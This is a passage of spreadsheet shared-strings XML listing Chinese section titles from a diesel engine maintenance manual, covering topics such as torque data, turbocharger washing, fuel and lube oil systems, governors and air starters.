        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机关键指标</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明识别号</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护程序介绍</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护操作程序计划维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作程序计划维护</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作参数和设定值</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力和公差数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重量说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件订单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务通函</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管件基本符号</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修后启动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机性能和工况</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧状况评估</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动失败</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运行变形</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴箱着火</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油箱维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分析数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧压力比较</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油清洁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞，连杆和缸套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮和凸轮驱动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀操作齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制和安全系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表和自动化</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机转换器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机框架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗水管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器透平端水洗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部燃油系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部滑油系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油温控阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部冷却水系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>从检查孔检查泄漏</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机缸体拆装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油系统衬套更换</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座环更换</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖冷却水系统检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元装机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和活塞杆的分离组装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套更换</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞气缸拆装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承的检查和更换</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油泵滚轮导套检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀的控制和调节</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功能测试和调节</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起停的调整和测试</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功能测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力控制器的调整和测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度传感器的调整和测试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器的安装和调整</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>lambda</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制器的调整</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查主轴承甩挡</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦的检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平端干洗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机端水洗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平端水洗</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查测试空气启动器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急起动阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查压缩空气</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油供给泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大压缩压力的调整</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射泵拆装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油分离滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查燃油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查冷却水系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥管更换</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥管维护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具测试</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具的应用</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元工具箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀和示功阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖顶盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞和连杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套和顶杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子调速器及其驱动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出模块</t>
    </r>
  </si>
  <si>
    <r>
      <t>APM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本地齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带齿飞轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座台架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器干洗罐</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气起动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主停车阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射系统开关阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带附件的盘车齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
